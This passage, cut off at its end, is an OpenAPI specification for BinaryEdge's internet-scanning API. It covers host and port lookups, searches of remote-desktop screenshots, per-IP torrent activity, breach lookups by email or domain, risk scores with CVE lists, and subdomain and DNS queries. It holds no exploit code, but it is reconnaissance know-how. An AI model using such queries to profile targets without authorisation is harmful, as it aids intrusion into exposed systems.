openapi: 3.0.0 info: title: "BinaryEdge's API" version: "1.0.0" description: "[BinaryEdge](https://www.binaryedge.io/) is Cybersecurity/Data Science company that focuses its effort on acquiring, analyzing and classifying internet wide data. We have developed a platform - [40fy](https://app.binaryedge.io/) that allows us and our customers to gather several data points from exposed servers online.\n\n The API provides access to that scanning platform, for your own usage, along with access to our curated databases so that you can do querying and analytics on our worldwide (constantly updated) collected data." servers: - description: "API V2" url: "https://api.binaryedge.io/v2" paths: /user/subscription: get: tags: - User summary: "" description: "Return details about your current subscription package." security: - Token: [] responses: '200': description: "Returned the user object." content: application/json: schema: type: object properties: subscription: type: object properties: name: type: string end_date: type: string requests_left: type: integer requests_plan: type: integer example: subscription: name: Free end_date: '2019-06-12' requests_left: 100 requests_plan: 100 '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/ip/{target}: get: tags: - Host summary: "" description: "Details about an Host. List of recent events for the specified host, including details of exposed ports and services.\n\n **Note**: Querying CIDRs is available for paid subscriptions only. When using CIDR, the number of credits that will be spent correspond to the number of targets that returned results. Example: a request for a /24 (256 targets) in which only 200 targets have results, will decrement 200 credits." security: - Token: [] parameters: - in: path name: target description: "target IP address or CIDR up to /24" schema: type: string required: true responses: '200': description: "Return Host deatils results" content: application/json: example: total: 2 query: xxx.xxx.xxx.xxx events: - results: - origin: module: grabber port: 41574 ip: xxx.xxx.xxx.xxx type: service-simple ts: 1537060019061 country: us result: data: state: state: open service: banner: 'HTTP/1.1 400 Bad Request\r\nDate: Sun, 16 Sep 2018 01:06:58 GMT\r\nContent-Type: text/html\r\nContent-Length: 268\r\nConnection: close\r\nserver: nginx\r\n\r\n\r\n400 The plain HTTP request was sent to HTTPS port\r\n\r\n

400 Bad Request

\r\n
The plain HTTP request was sent to HTTPS port
\r\n
openresty
\r\n\r\n\r\n' method: probe_matching cpe: - 'cpe:/a:igor_sysoev:nginx' name: ssl/http product: nginx target: protocol: tcp port: 443 ip: xxx.xxx.xxx.xxx port: 443 - results: - origin: module: grabber port: 54894 ip: xxx.xxx.xxx.xxx type: service-simple ts: 1534658530845 country: de result: data: state: state: open service: banner: 'HTTP/1.1 302 Moved Temporarily\r\nServer: nginx\r\nDate: Sun, 19 Aug 2018 06:02:09 GMT\r\nContent-Type: text/html\r\nContent-Length: 154\r\nConnection: close\r\nLocation: http://www.baidu.com/\r\n\r\n\r\n302 Found\r\n\r\n

302 Found

\r\n
nginx
\r\n\r\n\r\n' method: probe_matching cpe: - 'cpe:/a:igor_sysoev:nginx' name: http product: nginx target: protocol: tcp port: 80 ip: xxx.xxx.xxx.xxx port: 80 '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/ip/historical/{target}: get: tags: - Host summary: "" description: "Details about an Host, with data up to 6 months.\n\n List of events for the specified host, with events for each time that:\n - A port was detected open\n - A service was found running\n - Other modules were successfully executed" security: - Token: [] parameters: - in: path name: target description: "target IP address" schema: type: string required: true responses: '200': description: "Return Host deatils results" content: application/json: example: total: 4 query: xxx.xxx.xxx.xxx events: - target: ip: xxx.xxx.xxx.xxx protocol: tcp port: 25 origin: type: port ts: 1533433200683 result: null - target: ip: xxx.xxx.xxx.xxx protocol: tcp port: 25 origin: type: port ts: 1530560172852 result: null - target: ip: xxx.xxx.xxx.xxx protocol: tcp port: 25 origin: type: service-simple ts: 1533438628984 result: data: state: state: open service: product: Incapsula CDN httpd banner: 'HTTP/1.1 503 Service Unavailable\r\nContent-Type: text/html\r\nCache-Control: no-cache\r\nConnection: close\r\nContent-Length: 655\r\nX-Iinfo: 9-332984787-0 0NNN RT(1533438628522 0) q(0 -1 -1 -1) r(0 -1)\r\n\r\n' name: http method: probe_matching - target: ip: xxx.xxx.xxx.xxx protocol: tcp port: 25 origin: type: service-simple ts: 1530601327765 result: data: state: state: open service: product: Incapsula CDN httpd banner: 'HTTP/1.1 503 Service Unavailable\r\nContent-Type: text/html\r\nCache-Control: no-cache\r\nConnection: close\r\nContent-Length: 653\r\nX-Iinfo: 5-120325528-0 0NNN RT(1530601326800 0) q(0 -1 -1 -1) r(0 -1)\r\n\r\n' name: http method: probe_matching '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/search: get: tags: - Host summary: "" description: "Events based on a Query. List of recent events for the given query, including details of exposed ports and services. Can be used with [specific parameters](https://docs.binaryedge.io/image-search/) and/or full-text search." security: - Token: [] parameters: - in: query name: query schema: type: string description: "String used to query our data. If no filters are used, it will perform a full-text search on the entire events.\n See Search Parameters for details on what parameters can be used." required: true - in: query name: page description: "Number of the page - Maximum: 500 (10,000 results)" schema: type: integer minimum: 1 maximum: 500 default: 1 responses: '200': description: "Return Host deatils results" content: application/json: example: query: 'name:ldap AND ip:xxx.xxx.xxx.xxx' total: 2 page: 1 pagesize: 50 events: - origin: type: service-simple module: grabber country: uk ts: 1535985193912 ip: xxx.xxx.xxx.xxx port: 48872 target: ip: xxx.xxx.xxx.xxx port: 389 protocol: tcp result: data: service: name: ldap method: table_default state: state: open|filtered - origin: type: service-simple module: grabber country: us ts: 1535985193942 ip: xxx.xxx.xxx.xxx port: 38226 target: ip: xxx.xxx.xxx.xxx port: 389 protocol: tcp result: data: service: name: ldap method: table_default state: state: open|filtered '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/search/stats: get: tags: - Host summary: "" description: "Statistics of recent events for the given query. Can be used with specific parameters and/or full-text search." security: - Token: [] parameters: - in: query name: query schema: type: string description: "String used to query our data. If no filters are used, it will perform a full-text search on the entire events. See [Search Parameters](https://docs.binaryedge.io/search/) for details on what parameters can be used." required: true - in: query name: type description: "Type of statistic we want to obtain. Possible types include:\n - ports, products, versions, tags, services, countries, asn." required: true schema: type: string - in: query name: order description: "Whether to sort descendently or ascendently to get the top." schema: type: string enum: ["desc", "asc"] responses: '200': description: "Return stats results." content: application/json: example: - key: 80/tcp doc_count: 4467584 - key: 22/tcp doc_count: 4244020 - key: 53/tcp doc_count: 3566098 - key: 443/tcp doc_count: 3478298 - key: 21/tcp doc_count: 2726635 - key: 3389/tcp doc_count: 2303493 - key: 1900/tcp doc_count: 2172479 - key: 123/tcp doc_count: 2111621 - key: 23/tcp doc_count: 1988782 - key: '8000' doc_count: 1931731 '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/image/ip/{target}: get: tags: - Image summary: "" description: "Details about Remote Desktops found on an Host. List of screenshots and details extracted from them for the specified host, including OCR and whether faces were found or not, with data up to 2 months." security: - Token: [] parameters: - in: path name: target description: "target IP address" schema: type: string required: true - in: query name: page description: "Number of the page" schema: type: integer minimum: 1 default: 1 responses: '200': description: "Return Image results" content: application/json: example: pagesize: 20 query: xxx.xxx.xxx.xxx total: 1 page: 1 events: - thumb: 'https://d3f9qnon04ymh2.cloudfront.net/993cad4bb78fc0fa3e8f5f1d07311af802ea73ac48b6143c6286ae54df.jpg' tags: - VNC ts: 1536345753000 port: 5900 url: 'https://d1ngxp4ef6grqi.cloudfront.net/993cad4bb78fc0fa3e8f5f1d07311af802ea73ac48b6143c6286ae54df.jpg' height: 800 geoip: iso_code: BE timezone: Europe/Brussels latitude: 50.85 longitude: 4.35 location: - 4.35 - 50.85 country_name: Belgium city_name: null ip: xxx.xxx.xxx.xxx country: BE as_name: Proximus NV asn: 5432 width: 1280 image_id: 993cad4bb78fc0fa3e8f5f1d07311af802ea73ac48b6143c6286ae54df '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/image/search: get: tags: - Image summary: "" description: "Remote Desktops based on a Query. List of screenshots and details extracted from them for the given query, including OCR and whether faces were found or not. Can be used with specific parameters and/or full-text search." security: - Token: [] parameters: - in: query name: query schema: type: string description: "String used to query our data. If no filters are used, it will perform a full-text search on the entire events.\n See [Search Parameters](https://docs.binaryedge.io/image-search/) for details on what parameters can be used." required: true - in: query name: page description: "Number of the page - Maximum: 500 (10,000 results)" schema: type: integer minimum: 1 maximum: 500 default: 1 responses: '200': description: "Return Image results." content: application/json: example: pagesize: 20 query: xxx.xxx.xxx.xxx total: 1 page: 1 events: - thumb: 'https://d3f9qnon04ymh2.cloudfront.net/993cad4bb78fc0fa3e8f5f1d07311af802ea73ac48b6143c6286ae54df.jpg' tags: - VNC ts: 1536345753000 port: 5900 url: 'https://d1ngxp4ef6grqi.cloudfront.net/993cad4bb78fc0fa3e8f5f1d07311af802ea73ac48b6143c6286ae54df.jpg' height: 800 geoip: iso_code: BE timezone: Europe/Brussels latitude: 50.85 longitude: 4.35 location: - 4.35 - 50.85 country_name: Belgium city_name: null ip: xxx.xxx.xxx.xxx country: BE as_name: Proximus NV asn: 5432 width: 1280 image_id: 993cad4bb78fc0fa3e8f5f1d07311af802ea73ac48b6143c6286ae54df '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/image/tags: get: tags: - Image summary: "" description: "Get the list of possible tags for the images." security: - Token: [] responses: '200': description: "Return Image tags." content: application/json: example: - RDP - VNC - HAS_FACES - X11 - WINDOWS - MOBILE '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/torrent/ip/{target}: get: tags: - Torrent summary: "" description: "Details about torrents transferred by an Host. List of recent torrent events for the specified host, including details of the peer and torrent. See [Torrent Data](https://docs.binaryedge.io/torrent/) for more details." security: - Token: [] parameters: - in: path name: target description: "target IP address" schema: type: string required: true responses: '200': description: "Return Torrent results" content: application/json: example: query: xxx.xxx.xxx.xxx total: 5 events: - origin: type: peer module: torrent ts: 1539766360923 peer: ip: xxx.xxx.xxx.xxx port: 29252 torrent: infohash: 0912d200210318a5f65450e63834f4100293ae48 name: 'A.Family.for.the.Holidays.2018.BRRip.XviD.AC3-EVO[TGx]' source: ThePirateBay category: Video subcategory: Movies - origin: type: peer module: torrent ts: 1539740702093 peer: ip: xxx.xxx.xxx.xxx port: 29252 torrent: infohash: 5d917a61489cba4ad346962f352b64b2c652e43b name: Big.Hero.6.The.Series.S01E23E24E25.AMZN.WEB-DL.XviD.MP3 source: ThePirateBay category: Video subcategory: TV shows '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/torrent/historical/{target}: get: tags: - Torrent summary: "" description: "Details about torrents transferred by an Host, with data up to 6 months.\n\n List of torrent events for the specified host, with events for each time that a new transfer was detected on the DHT. See [Torrent Data](https://docs.binaryedge.io/torrent/) for more details.\n\n **Note:** Available for paid subscriptions only." security: - Token: [] parameters: - in: path name: target description: "target IP address" schema: type: string required: true responses: '200': description: "Return Torrent results" content: application/json: example: query: xxx.xxx.xxx.xxx total: 104 events: - origin: type: peer module: torrent ts: 1539766360923 peer: ip: xxx.xxx.xxx.xxx port: 29252 torrent: infohash: 0912d200210318a5f65450e63834f4100293ae48 name: 'A.Family.for.the.Holidays.2018.BRRip.XviD.AC3-EVO[TGx]' source: ThePirateBay category: Video subcategory: Movies - origin: type: peer module: torrent ts: 1539766357370 peer: ip: xxx.xxx.xxx.xxx port: 29252 torrent: infohash: 0912d200210318a5f65450e63834f4100293ae48 name: 'A.Family.for.the.Holidays.2018.BRRip.XviD.AC3-EVO[TGx]' source: ThePirateBay category: Video subcategory: Movies - origin: type: peer module: torrent ts: 1539740702093 peer: ip: xxx.xxx.xxx.xxx port: 29252 torrent: infohash: 5d917a61489cba4ad346962f352b64b2c652e43b name: Big.Hero.6.The.Series.S01E23E24E25.AMZN.WEB-DL.XviD.MP3 source: ThePirateBay category: Video subcategory: TV shows - origin: type: peer module: torrent ts: 1539740701112 peer: ip: xxx.xxx.xxx.xxx port: 29252 torrent: infohash: 5d917a61489cba4ad346962f352b64b2c652e43b name: Big.Hero.6.The.Series.S01E23E24E25.AMZN.WEB-DL.XviD.MP3 source: ThePirateBay category: Video subcategory: TV shows '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/dataleaks/email/{email}: get: tags: - Dataleak summary: "" description: "Allows you to search across multiple data breaches to see if any of your email addresses has been compromised. If you are affected, we recommend you change your password on the respective services.\n\n Verify how many dataleaks affected an specific email address.\n\n **Note:** Available for paid subscriptions only." security: - Token: [] parameters: - in: path name: email description: "target email address." schema: type: string required: true responses: '200': description: "Return Dataleaks results" content: application/json: example: total: 18 events: - antipublic - ashleymadison - breachcompilation - cannabis - dropbox - exploitin - fling - imesh - lastfm - linkedin - mate1 - neopets - pastebin - rsboards - tianya - torrentinvites - tumblr - vk query: user@example.com '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/dataleaks/organization/{domain}: get: tags: - Dataleak summary: "" description: "Verify how many emails are affected by dataleaks for a specific domain. We don't provide the list of affected emails.\n\n **Note:** Available for paid subscriptions only." security: - Token: [] parameters: - in: path name: domain description: "target domain" schema: type: string required: true responses: '200': description: "Return Dataleaks results" content: application/json: example: total: 192656 groups: - leak: antipublic count: 44489 - leak: exploitin count: 19995 - leak: badoo count: 13028 - leak: myspace count: 26266 - leak: vk count: 2132 - leak: imesh count: 7549 - leak: breachcompilation count: 58833 - leak: mate1 count: 2923 - leak: webhost count: 152 - leak: fling count: 3058 - leak: adobe count: 734 - leak: dropbox count: 1832 - leak: zoosk count: 2506 - leak: pastebin count: 2417 - leak: ashleymadison count: 963 - leak: neopets count: 1772 - leak: tumblr count: 789 - leak: taobao count: 98 - leak: xat count: 774 - leak: linkedin count: 805 - leak: tianya count: 171 - leak: youporn count: 107 - leak: leet count: 84 - leak: lastfm count: 413 - leak: modernbusinesssolutions count: 134 - leak: 7k7k count: 84 - leak: myrepospace count: 11 - leak: mpgh count: 62 - leak: r2games count: 64 - leak: patreon count: 17 - leak: twitter count: 66 - leak: yahoo count: 2 - leak: nihonomaru count: 34 - leak: gawker count: 26 - leak: nulled count: 10 - leak: habbo count: 31 - leak: abusewithus count: 23 - leak: rsboards count: 14 - leak: cannabis count: 25 - leak: torrentinvites count: 15 - leak: dlh count: 11 - leak: utorrent count: 8 - leak: nextgenupdate count: 30 - leak: xsplit count: 26 - leak: clixsense count: 9 - leak: brazzers count: 5 - leak: adultfriendfinder count: 10 - leak: majorgeeks count: 4 - leak: plex count: 1 - leak: thebot count: 4 - leak: acne count: 4 - leak: cheapassgamer count: 2 - leak: ps3hax count: 6 - leak: vbulletin count: 5 - leak: gta count: 1 - leak: latimes count: 1 - leak: loungeboard count: 1 - leak: crackingforum count: 3 - leak: experian count: 1 - leak: androidforums count: 1 - leak: abandonia count: 1 - leak: minefield count: 1 - leak: delicioustakoyaki count: 3 - leak: hawkingtech count: 1 - leak: newseasims count: 1 - leak: blackhatworld count: 3 - leak: win7vista count: 1 - leak: sexavet count: 1 - leak: muslimmatch count: 1 - leak: forbes count: 1 - leak: sktorrent count: 1 query: example.com '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/dataleaks/info: get: tags: - Dataleak summary: "" description: "Get all available information about the dataleaks our platform keeps track." security: - Token: [] responses: '200': description: "Return available Dataleaks." content: application/json: example: sktorrent: label: Downloads description: SKTorrent is a torrent tracking site. techname: sktorrent logo: 'https://s3-eu-west-1.amazonaws.com/be-resources/dataleaks/sktorrent.png' data: 'usernames, email addresses, passwords' year: '2016' name: sktorrent fullname: SKTorrent samsclub: label: Unverified description: Sam's Club is an american chain of wholesale clubs owned by Walmart. techname: samsclub logo: 'https://s3-eu-west-1.amazonaws.com/be-resources/dataleaks/samsclub.jpg' data: email addresses year: '2016' name: samsclub fullname: Sam's Club yandex: label: Technology description: Yandex is a technology company that provides the largest search engine in Russia. techname: yandex logo: 'https://s3-eu-west-1.amazonaws.com/be-resources/dataleaks/yandex.png' data: 'email addresses, passwords' year: '2014' name: yandex fullname: Yandex '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/score/ip/{target}: get: tags: - Risk Score summary: "" description: "IP Risk Score. Scoring is based on all information found on our databases regarding an IP and refers to the level of exposure of a target, i.e, the higher the score, the greater the risk of exposure.\n\n More details about scoring can be found on [here](https://github.com/binaryedge/ratemyip-openframework/blob/master/ip-score.md).\n\n **Note**: Available for paid subscriptions only." security: - Token: [] parameters: - in: path name: target description: "target IP address" schema: type: string required: true responses: '200': description: "Return Rish Score result" content: application/json: example: normalized_ip_score: 97.1 normalized_ip_score_detailed: cve: 100 attack_surface: 100 encryption: 100 rms: 100 storage: 100 web: 100 torrents: 0 ip_score_detailed: cve: 3 attack_surface: 2 encryption: 6 rms: 10 storage: 10 web: 3 torrents: 0 results_detailed: ports: open: - 4991 - 6666 - 22 - 443 - 3389 - 5901 - 23 - 80 - 1883 - 27017 - 6379 - 11211 - 9200 - 21 - 8080 - 25 - 3306 score: 17 cve: result: - port: 4991 cve: - cpe: 'cpe:/a:igor_sysoev:nginx:1.2.6' cve_list: - cve: CVE-2013-2070 cvss: 5.8 - cve: CVE-2013-4547 cvss: 7.5 - cve: CVE-2014-3616 cvss: 4.3 - cve: CVE-2016-1247 cvss: 7.2 - cve: CVE-2016-0742 cvss: 5 - cve: CVE-2016-0746 cvss: 7.5 - cve: CVE-2016-0747 cvss: 5 - cve: CVE-2016-4450 cvss: 5 score: 47.3 score: 47.3 - port: 6666 cve: product: Postgres-XC version: '1.1' cve_list: [] score: 0 score: 0 - port: 6666 cve: - cpe: 'cpe:/a:mysql:mysql:5.5.18.1' cve_list: - cve: CVE-2005-1274 cvss: 10 - cve: CVE-2005-0081 cvss: 5 - cve: CVE-2005-0082 cvss: 5 - cve: CVE-2005-0684 cvss: 10 - cve: CVE-2012-2750 cvss: 10 - cve: CVE-2012-4414 cvss: 6.5 - cve: CVE-2011-2262 cvss: 5 - cve: CVE-2012-0112 cvss: 3.5 - cve: CVE-2012-0113 cvss: 5.5 - cve: CVE-2012-0115 cvss: 4 - cve: CVE-2012-0116 cvss: 4.9 - cve: CVE-2012-0117 cvss: 3.5 - cve: CVE-2012-0118 cvss: 4.9 - cve: CVE-2012-0119 cvss: 4 - cve: CVE-2012-0120 cvss: 4 - cve: CVE-2012-0553 cvss: 7.5 - cve: CVE-2012-2102 cvss: 3.5 - cve: CVE-2012-2122 cvss: 5.1 - cve: CVE-2012-2749 cvss: 4 - cve: CVE-2013-1492 cvss: 7.5 - cve: CVE-2015-3152 cvss: 4.3 - cve: CVE-2016-0610 cvss: 3.5 - cve: CVE-2016-0616 cvss: 4 - cve: CVE-2013-5807 cvss: 4.9 - cve: CVE-2016-6664 cvss: 6.9 - cve: CVE-2004-0931 cvss: 5 - cve: CVE-2017-3302 cvss: 5 - cve: CVE-2016-7412 cvss: 6.8 - cve: CVE-2012-5627 cvss: 4 - cve: CVE-2014-0001 cvss: 7.5 - cve: CVE-2016-6662 cvss: 10 - cve: CVE-2009-4833 cvss: 5.8 - cve: CVE-2012-0485 cvss: 4 - cve: CVE-2012-0486 cvss: 5 - cve: CVE-2012-0487 cvss: 4 - cve: CVE-2012-0488 cvss: 4 - cve: CVE-2012-0489 cvss: 4 - cve: CVE-2012-0491 cvss: 4 - cve: CVE-2012-0492 cvss: 2.1 - cve: CVE-2012-0493 cvss: 2.1 - cve: CVE-2012-0494 cvss: 1.7 - cve: CVE-2012-0495 cvss: 4 - cve: CVE-2012-0496 cvss: 4.3 - cve: CVE-2012-5611 cvss: 6.5 - cve: CVE-2012-5612 cvss: 6.5 - cve: CVE-2016-6663 cvss: 4.4 - cve: CVE-2005-1636 cvss: 4.6 score: 242.3 score: 242.3 - port: 8080 cve: - cpe: 'cpe:/a:indy:httpd:13.2.3.2235' cve_list: [] score: 0 score: 0 - port: 25 cve: cpe: - 'cpe:/a:postfix:postfix' cve_list: no_version_provided score: 0 score: 0 - port: 3306 cve: - cpe: 'cpe:/a:mysql:mysql:5.5.47-mariadb' cve_list: - cve: CVE-2005-1274 cvss: 10 - cve: CVE-2005-0081 cvss: 5 - cve: CVE-2005-0082 cvss: 5 - cve: CVE-2005-0684 cvss: 10 - cve: CVE-2011-2262 cvss: 5 - cve: CVE-2012-0112 cvss: 3.5 - cve: CVE-2012-0113 cvss: 5.5 - cve: CVE-2012-0115 cvss: 4 - cve: CVE-2012-0116 cvss: 4.9 - cve: CVE-2012-0117 cvss: 3.5 - cve: CVE-2012-0118 cvss: 4.9 - cve: CVE-2012-0119 cvss: 4 - cve: CVE-2012-0120 cvss: 4 - cve: CVE-2015-3152 cvss: 4.3 - cve: CVE-2016-0610 cvss: 3.5 - cve: CVE-2016-6664 cvss: 6.9 - cve: CVE-2004-0931 cvss: 5 - cve: CVE-2017-3302 cvss: 5 - cve: CVE-2016-7412 cvss: 6.8 - cve: CVE-2016-6662 cvss: 10 - cve: CVE-2009-4833 cvss: 5.8 - cve: CVE-2012-0485 cvss: 4 - cve: CVE-2012-0486 cvss: 5 - cve: CVE-2012-0487 cvss: 4 - cve: CVE-2012-0488 cvss: 4 - cve: CVE-2012-0489 cvss: 4 - cve: CVE-2012-0491 cvss: 4 - cve: CVE-2012-0492 cvss: 2.1 - cve: CVE-2012-0493 cvss: 2.1 - cve: CVE-2012-0494 cvss: 1.7 - cve: CVE-2012-0495 cvss: 4 - cve: CVE-2012-0496 cvss: 4.3 - cve: CVE-2016-6663 cvss: 4.4 - cve: CVE-2005-1636 cvss: 4.6 score: 164.8 score: 164.8 score: 454.40000000000003 ssh: result: - port: 22 algorithms: mac: - mac: hmac-sha1-96 score: 2 - mac: hmac-sha1 score: 2 - mac: hmac-md5 score: 2 key_exchange: - kex: diffie-hellman-group1-sha1 score: 2 encryption: - enc: aes128-cbc score: 0 - enc: 3des-cbc score: 2 - enc: aes256-cbc score: 0 keys: - fingerprint: 'b7:d7:10:fd:b8:fb:91:2b:5e:a8:01:b2:03:e3:10:4f' key_length: length: 1024 score: 2 debian_key: found: false score: 0 score: 12 score: 12 rms: result: - port: 3389 rms: rdp score: 8 - port: 5901 rms: vnc score: 10 - port: 23 rms: telnet score: 8 score: 26 ssl: result: - port: 443 heartbleed: heartbleed: true score: 10 ccs: ccs: true score: 6 crime: crime: true score: 6 renegotiation: renegotiation: true score: 6 ocsp: ocsp: true score: 3 no_certificates: no_certificates: false score: 0 leaf_certificate: sha1_fingerprint: c0e750b485ed9250f93f684bb1a87d37bec843b8 issuer: Huawei subject: Huawei validity: date: '2016-07-14 09:48:15' status: expired score: 4 signature: signature: sha1WithRSAEncryption score: 5 self_signed: self_signed: single-certificate score: 5 other_certificates: [] ciphers: - drown: true score: 6 - poodle: true score: 6 - logjam: false score: 0 score: 52 score: 52 wec: result: - port: 25 service: smtp score: 6 score: 6 ftp: result: - port: 21 service: ftp score: 6 score: 6 http: result: - port: 4991 service: http score: 6 - port: 8080 service: http score: 6 score: 12 storage: result: - port: 6666 product: postgres score: 4 - port: 6666 product: mysql score: 4 - port: 1883 product: mqtt connected: true score: 10 - port: 27017 product: mongodb connected: true score: 10 - port: 6379 product: redis connected: true score: 10 - port: 11211 product: memcached connected: true score: 10 - port: 9200 product: elasticsearch connected: true score: 10 - port: 3306 product: mysql score: 4 score: 62 web: result: - port: 80 headers: true score: 3 score: 3 torrents: result: - torrents: false score: 0 score: 0 ip_address: xxx.xxx.xxx.xxx '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/cve/ip/{target}: get: tags: - Risk Score summary: "" description: "Get list of CVEs that migh affect a specific IP.\n\n **Note**: Available for paid subscriptions only." security: - Token: [] parameters: - in: path name: target description: "target IP address" schema: type: string required: true responses: '200': description: "Return Rish Score result" content: application/json: example: query: xxx.xxx.xxx.xxx events: ip: xxx.xxx.xxx.xxx ports: - 11 - 15 - 21 - 25 - 79 - 80 - 111 - 119 - 143 - 3389 - 6000 - 8080 results: - port: 111 cpe: [] ts: 1550723598503 cves: [] - port: 11 cpe: [] ts: 1550713541527 cves: [] - port: 6000 cpe: [] ts: 1549215405492 cves: [] - port: 25 cpe: [] ts: 1551649814882 cves: [] - port: 79 cpe: [] ts: 1550042997176 cves: [] - port: 8080 cpe: - 'cpe:/a:apache:http_server:2.4.7' ts: 1551779143688 cves: - cve: CVE-2018-17199 cvss: 5 - cve: CVE-2018-1312 cvss: 6.8 - cve: CVE-2018-1283 cvss: 3.5 - cve: CVE-2017-9798 cvss: 5 - cve: CVE-2017-9788 cvss: 6.4 - cve: CVE-2017-7679 cvss: 7.5 - cve: CVE-2017-15715 cvss: 6.8 - cve: CVE-2017-15710 cvss: 5 - cve: CVE-2016-8743 cvss: 5 - cve: CVE-2016-8612 cvss: 3.3 - cve: CVE-2016-4975 cvss: 4.3 - cve: CVE-2016-2161 cvss: 5 - cve: CVE-2016-0736 cvss: 5 - cve: CVE-2015-3185 cvss: 4.3 - cve: CVE-2015-3184 cvss: 5 - cve: CVE-2014-8109 cvss: 4.3 - cve: CVE-2014-3523 cvss: 5 - cve: CVE-2014-0231 cvss: 5 - cve: CVE-2014-0226 cvss: 6.8 - cve: CVE-2014-0118 cvss: 4.3 - cve: CVE-2014-0117 cvss: 4.3 - cve: CVE-2014-0098 cvss: 5 - cve: CVE-2013-6438 cvss: 5 - port: 3389 cpe: [] ts: 1551348878536 cves: [] - port: 15 cpe: [] ts: 1549108048510 cves: [] - port: 143 cpe: [] ts: 1549566728724 cves: [] - port: 80 cpe: - 'cpe:/a:igor_sysoev:nginx:1.4.6' ts: 1550250446832 cves: - cve: CVE-2019-7401 cvss: 7.5 - cve: CVE-2016-4450 cvss: 5 - cve: CVE-2016-0747 cvss: 5 - cve: CVE-2016-0746 cvss: 7.5 - cve: CVE-2016-0742 cvss: 5 - cve: CVE-2014-3616 cvss: 4.3 - cve: CVE-2014-0133 cvss: 5.1 - port: 21 cpe: [] ts: 1550642140211 cves: [] - port: 119 cpe: [] ts: 1550377835750 cves: [] '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/domains/subdomain/{target}: get: tags: - Domain summary: "" description: "Return list of subdomains known from the target domains." security: - Token: [] parameters: - in: path name: target description: "Domain you want to get list of known subdomains." schema: type: string required: true - in: query name: page description: "Number of the page - Maximum: 500 (10,000 results)" schema: type: integer minimum: 1 maximum: 500 default: 1 responses: '200': description: "Return Domains results" content: application/json: example: query: 'root:example.com' page: 1 pagesize: 100 total: 6308 events: - m.example.com - startup.antichat.example.com - anandop1.example.com - vladimirbezz3.example.com '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/domains/dns/{target}: get: tags: - Domain summary: "" description: "Return list of known DNS results for the target domain. Possible types of records currently available:\n\n -A, AAAA, NS, MX" security: - Token: [] parameters: - in: path name: target description: "Domain you want to get DNS related data." schema: type: string required: true - in: query name: page description: "Number of the page - Maximum: 500 (10,000 results)" schema: type: integer minimum: 1 maximum: 500 default: 1 responses: '200': description: "Return Domains results" content: application/json: example: query: 'root:example.com' page: 1 pagesize: 100 total: 6308 events: - A: - 92.63.97.42 updated_at: '2018-09-22T04:53:21.082802' domain: startup.antichat.example.com root: example.com - A: - 93.184.216.34 MX: - example.com NS: - ns1.example.com - ns2.example.com updated_at: '2018-12-10T13:20:16.854174' domain: example.com root: example.com - A: - 91.235.136.112 updated_at: '2018-09-22T04:14:29.031596' domain: vladimirbezz3.example.com root: example.com - A: - 93.179.68.6 updated_at: '2018-09-22T03:51:36.852124' domain: i.seeva.example.com root: example.com '400': $ref: '#/components/responses/HTTPStatusMessage400' '401': $ref: '#/components/responses/HTTPStatusMessage401' '403': $ref: '#/components/responses/HTTPStatusMessage403' '404': $ref: '#/components/responses/HTTPStatusMessage404' /query/domains/ip/{target}: get: tags: - Domain summary: "" description: "Return records that have the specified IP address in their A or AAAA 